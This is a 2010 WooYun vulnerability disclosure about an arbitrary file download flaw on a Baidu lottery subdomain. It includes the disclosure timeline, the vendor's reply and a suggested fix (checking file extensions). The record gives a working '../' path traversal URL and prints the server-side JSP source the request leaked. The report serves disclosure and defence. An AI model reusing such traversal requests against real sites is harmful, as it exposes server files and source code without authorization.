漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-0323
漏洞标题:百度某频道存在下载任意文件漏洞
相关厂商:百度
漏洞作者: Jannock
提交时间:2010-08-26 23:55
修复时间:2010-09-26 03:00
公开时间:2010-09-26 03:00
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-08-26: 细节已通知厂商并且等待厂商处理中
2010-08-27: 厂商已经确认,细节仅向厂商公开
2010-09-06: 细节向核心白帽子及相关领域专家公开
2010-09-16: 细节向普通白帽子公开
2010-09-26: 细节向实习白帽子公开
2010-09-26: 细节向公众公开
简要描述:
百度某频道存在下载任意文件漏洞
详细说明:
下载图片处没有对文件类型后辍作判断,造成下载任意文件漏洞。
测试:
http://cp.baidu.com/downAction.do?file=../3g/zst/showimg.jsp
漏洞证明:
<%@page import="com.starlott.dyjnews.util.IMGKeyValue"%>
<%@ page language="java" import="java.text.SimpleDateFormat,java.util.Date" contentType="text/html; charset=utf-8"%>
<%@ include file="/3g/common/taglibs.jsp"%>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="/3g/css/common.css" rel="stylesheet" type="text/css"/>
<title>走势图表</title>
</head>
<body>
<c:set var="flag" value="${fn:split(param.p,'/')[0]}" scope="page"></c:set>
<c:if test="${flag == 'ssq' }">
<c:set var="code" value="FCQGSSQ"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCQGSSQ"/>
</c:if>
<c:if test="${flag == 'lt' }">
<c:set var="code" value="SHTCDLT"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCQGSSQ"/>
</c:if>
<c:if test="${flag == 'p3' }">
<c:set var="code" value="SHTCP3"/>
<c:set var="buyUrl" value="/3g/lott.do?code=SHTCP3"/>
</c:if>
<c:if test="${flag == '3d' }">
<c:set var="code" value="FCQG3D"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCQG3D"/>
</c:if>
<c:if test="${flag == '11x5' }">
<c:set var="code" value="TCJXDLC"/>
<c:set var="buyUrl" value="/3g/lott.do?code=TCJXDLC"/>
</c:if>
<c:if test="${flag == 'TCCQKL123' }">
<c:set var="code" value="TCCQKL123"/>
<c:set var="buyUrl" value="/3g/lott.do?code=TCCQKL123"/>
</c:if>
<c:if test="${flag == 'ssc' }">
<c:set var="code" value="FCCQSSC"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCCQSSC"/>
</c:if>
<c:if test="${flag == 'ssl' }">
<c:set var="code" value="FCSHSSL"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCSHSSL"/>
</c:if>
<c:if test="${flag == 'sfc' }">
<c:set var="code" value="SHTCSFC"/>
<c:set var="buyUrl" value="/3g/lott.do?code=SHTCSFC"/>
</c:if>
<c:set var="tname" value="${param.p}" scope="page"></c:set>
<c:set var="typename" value="${code=='FCQGSSQ'?'双色球':code=='SHTCDLT'?'大乐透':code=='SHTCP3'?'排列三':code=='FCSHSSL'?'时时乐':code=='FCQG3D'?'福彩3D':code=='FCCQSSC'?'时时彩':code=='TCJXDLC'?'11选5':'双色球'}"></c:set>
<div class="dg"><a sendreferer="true" href="/3g/index.do">首页</a>>><a sendreferer="true" href="/3g/zst/index.jsp">图表中心</a>>>${typename}走势图表<br/></div>
<%@include file="/3g/common/inc/header.jsp"%>
<div class="lmc">
<strong><%=IMGKeyValue.getName(request.getParameter("p"))%></strong><br/>
<img alt="" src="/imges/${param.p}"/><br/>
<a sendreferer="true" href="/downAction.do?file=${param.p }">下载</a><br/><br/>
<a sendreferer="true" href="/3g/lott.do?code=${code }">购买${typename}</a><br/>
<a sendreferer="true" href="/3g/zst/${flag}.jsp">${typename }图表中心</a><br/>
</div>
<%@include file="/3g/common/inc/footer.jsp"%>
修复方案:
对文件类型后辍作判断
版权声明:转载请注明来源 Jannock@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2010-08-27 10:52
厂商回复:
感谢,我们会通知第三方进行修复。
由于不是百度服务器,因此危害等级为中
最新状态:
暂无